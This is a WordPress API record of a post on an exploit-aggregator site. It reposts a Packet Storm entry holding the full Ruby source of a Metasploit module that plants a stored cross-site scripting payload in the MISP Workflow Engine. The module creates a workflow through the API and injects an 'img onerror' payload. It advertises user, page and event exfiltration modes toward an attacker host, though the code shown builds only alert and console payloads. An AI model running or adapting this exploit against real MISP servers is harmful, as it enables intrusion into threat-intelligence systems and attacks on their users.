{"id":49295,"date":"2026-04-24T16:47:59","date_gmt":"2026-04-24T16:47:59","guid":{"rendered":"http:\/\/localhost\/?p=49295"},"modified":"2026-04-24T16:47:59","modified_gmt":"2026-04-24T16:47:59","slug":"misp-2527-workflow-engine-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=49295","title":{"rendered":"\ud83d\udcc4 MISP 2.5.27 Workflow Engine Cross Site Scripting_PACKETSTORM:219772"},"content":{"rendered":"

{“lastseen”:”2026-04-24T20:45:25″,”description”:”This Metasploit auxiliary module targets a potential stored cross site scripting vulnerability in the MISP Workflow Engine. It is designed to interact with the MISP API, create workflows, and inject malicious payloads into workflow data fields…”,”published”:”2026-04-24T00:00:00″,”modified”:”2026-04-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 MISP 2.5.27 Workflow Engine Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:219772″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n | # Title : MISP 2.5.27 Workflow Engine Stored XSS Metasploit Module |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/www.misp-project.org\/2025\/11\/27\/misp.2.5.27.released.html\/ |\\n ==================================================================================================================================\\n \\n [+] Summary : This Metasploit auxiliary module targets a potential stored Cross-Site Scripting (XSS) vulnerability in the MISP Workflow Engine. \\n It is designed to interact with the MISP API, create workflows, and inject malicious payloads into workflow data fields.\\n \\n \\n [+] POC : \\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n ##\\n \\n class MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Auxiliary::Report\\n include Msf::Auxiliary::Scanner\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘MISP Workflow Engine Stored Cross-Site Scripting’,\\n ‘Description’ =\\u003e %q{…},\\n ‘Author’ =\\u003e [‘indoushka’],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’, ‘win’],\\n ‘Targets’ =\\u003e [[‘Automatic’, {}]],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2025-03-28’\\n )\\n )\\n \\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘Base path’, ‘\/’]),\\n OptString.new(‘API_KEY’, [true, ‘API key’, ”]),\\n OptEnum.new(‘PAYLOAD_MODE’, [true, ‘Mode’,\\n ‘alert’, [‘alert’,’alert_info’,’console’,’console_info’,’exfiltrate_users’,’exfiltrate_page’,’exfiltrate_events’]\\n ]),\\n OptString.new(‘ATTACKER_HOST’, [false, ‘host:port’, ‘127.0.0.1:8000’]),\\n OptInt.new(‘EXFIL_LIMIT’, [true, ‘limit’, 20]),\\n OptString.new(‘CUSTOM_PAYLOAD’, [false, ‘custom’, ”]),\\n OptBool.new(‘VERIFY_SSL’, [true, ‘SSL verify’, false])\\n ])\\n end\\n \\n def setup\\n @base_url = normalize_uri(target_uri.to_s)\\n @api_key = datastore[‘API_KEY’]\\n @mode = datastore[‘PAYLOAD_MODE’]\\n @attacker_host = datastore[‘ATTACKER_HOST’].to_s\\n @limit = datastore[‘EXFIL_LIMIT’].to_i\\n @custom_payload = datastore[‘CUSTOM_PAYLOAD’].to_s\\n @workflow_id = nil\\n @trigger_id = nil\\n end\\n \\n def run_host(ip)\\n print_status(\\”Target: #{ip}:#{rport}\\”)\\n \\n return unless check_vulnerability\\n return unless create_workflow\\n return unless inject_payload\\n \\n verify_payload\\n print_exploit_info\\n end\\n \\n def check_vulnerability\\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(@base_url, ‘servers\/getVersion’),\\n ‘method’ =\\u003e ‘GET’,\\n ‘headers’ =\\u003e { ‘Authorization’ =\\u003e @api_key }\\n })\\n \\n return false unless res \\u0026\\u0026 res.body\\n \\n begin\\n json = JSON.parse(res.body)\\n if json[‘version’]\\n version = json[‘version’].to_s\\n if version.start_with?(‘2.5’)\\n print_good(\\”Version: #{version} (likely vulnerable)\\”)\\n end\\n end\\n rescue\\n end\\n \\n res2 = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(@base_url, ‘workflows\/index’),\\n ‘method’ =\\u003e ‘GET’,\\n ‘headers’ =\\u003e { ‘Authorization’ =\\u003e @api_key }\\n })\\n \\n return false unless res2\\n \\n if res2.code == 200\\n print_good(\\”Workflow API accessible\\”)\\n return true\\n end\\n \\n false\\n end\\n \\n def create_workflow\\n name = \\”XSS_#{Rex::Text.rand_text_alpha(8)}\\”\\n \\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(@base_url, ‘workflows\/add’),\\n ‘method’ =\\u003e ‘POST’,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e { ‘Workflow’ =\\u003e { ‘name’ =\\u003e name } }.to_json,\\n ‘headers’ =\\u003e { ‘Authorization’ =\\u003e @api_key }\\n })\\n \\n return false unless res \\u0026\\u0026 res.body\\n \\n json = JSON.parse(res.body) rescue nil\\n return false unless json\\n \\n wf = json.dig(‘saved’, ‘Workflow’) || json[‘Workflow’]\\n return false unless wf\\n \\n @workflow_id = wf[‘id’].to_s\\n @trigger_id = wf[‘trigger_id’].to_s\\n \\n return false if @workflow_id.empty? || @trigger_id.empty?\\n \\n print_good(\\”Workflow: #{@workflow_id}\\”)\\n true\\n end\\n \\n def build_js_payload\\n return @custom_payload unless @custom_payload.empty?\\n \\n case @mode\\n when ‘alert’\\n \\”alert(‘MISP XSS’);\\”\\n when ‘console’\\n \\”console.log(‘MISP XSS’);\\”\\n else\\n \\”alert(‘XSS’);\\”\\n end\\n end\\n \\n def build_html_payload(js)\\n \\”\\u003cimg src=x onerror=\\\\\\”#{js.gsub(‘\\”‘,’\\\\\\”‘)}\\\\\\”\\u003e\\”\\n end\\n \\n def inject_payload\\n return false unless @workflow_id \\u0026\\u0026 @trigger_id\\n \\n js = build_js_payload\\n html = build_html_payload(js)\\n \\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(@base_url, \\”workflows\/edit\/#{@workflow_id}\\”),\\n ‘method’ =\\u003e ‘POST’,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e {\\n ‘Workflow’ =\\u003e {\\n ‘id’ =\\u003e @workflow_id,\\n ‘data’ =\\u003e html\\n }\\n }.to_json,\\n ‘headers’ =\\u003e { ‘Authorization’ =\\u003e @api_key }\\n })\\n \\n if res \\u0026\\u0026 res.code == 200\\n print_good(\\”Payload injected\\”)\\n return true\\n end\\n \\n false\\n end\\n \\n def verify_payload\\n return unless @workflow_id\\n \\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(@base_url, \\”workflows\/view\/#{@workflow_id}\\”),\\n ‘method’ =\\u003e ‘GET’,\\n ‘headers’ =\\u003e { ‘Authorization’ =\\u003e @api_key }\\n })\\n \\n return false unless res \\u0026\\u0026 res.body\\n if res.body.include?(@workflow_id)\\n print_good(\\”Workflow exists (not reliable XSS proof)\\”)\\n return true\\n end\\n \\n false\\n end\\n \\n def print_exploit_info\\n return unless @workflow_id\\n \\n url = normalize_uri(@base_url, \\”workflows\/view\/#{@workflow_id}\\”)\\n \\n print_good(\\”URL: #{url}\\”)\\n \\n report_note(\\n host: (defined?(rhost) ? rhost : nil),\\n port: (defined?(rport) ? rport : nil),\\n type: ‘misp.xss’,\\n data: { workflow_id: @workflow_id, url: url },\\n update: :unique_data\\n )\\n end\\n end\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219772″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219772\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-04-24T20:45:25″,”description”:”This Metasploit auxiliary module targets a potential stored cross site scripting vulnerability in the MISP Workflow Engine. It is designed to interact with the MISP…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-49295","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 MISP 2.5.27 Workflow Engine Cross Site Scripting_PACKETSTORM:219772 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=49295\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 MISP 2.5.27 Workflow Engine Cross Site Scripting_PACKETSTORM:219772 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-04-24T20:45:25″,”description”:”This Metasploit auxiliary module targets a potential stored cross site scripting vulnerability in the MISP Workflow Engine. It is designed to interact with the MISP...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=49295\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-24T16:47:59+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49295#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49295\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 MISP 2.5.27 Workflow Engine Cross Site Scripting_PACKETSTORM:219772\",\"datePublished\":\"2026-04-24T16:47:59+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49295\"},\"wordCount\":1104,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=49295#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49295\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49295\",\"name\":\"\ud83d\udcc4 MISP 2.5.27 Workflow Engine Cross Site Scripting_PACKETSTORM:219772 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-24T16:47:59+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49295#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=49295\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49295#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 MISP 2.5.27 Workflow Engine Cross Site Scripting_PACKETSTORM:219772\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 MISP 2.5.27 Workflow Engine Cross Site Scripting_PACKETSTORM:219772 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=49295","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 MISP 2.5.27 Workflow Engine Cross Site Scripting_PACKETSTORM:219772 - zero redgem","og_description":"{“lastseen”:”2026-04-24T20:45:25″,”description”:”This Metasploit auxiliary module targets a potential stored cross site scripting vulnerability in the MISP Workflow Engine. It is designed to interact with the MISP...","og_url":"https:\/\/zero.redgem.net\/?p=49295","og_site_name":"zero redgem","article_published_time":"2026-04-24T16:47:59+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=49295#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=49295"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 MISP 2.5.27 Workflow Engine Cross Site Scripting_PACKETSTORM:219772","datePublished":"2026-04-24T16:47:59+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=49295"},"wordCount":1104,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=49295#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=49295","url":"https:\/\/zero.redgem.net\/?p=49295","name":"\ud83d\udcc4 MISP 2.5.27 Workflow Engine Cross Site Scripting_PACKETSTORM:219772 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-24T16:47:59+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=49295#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=49295"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=49295#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 MISP 2.5.27 Workflow Engine Cross Site Scripting_PACKETSTORM:219772"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/49295","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=49295"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/49295\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=49295"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=49295"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=49295"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}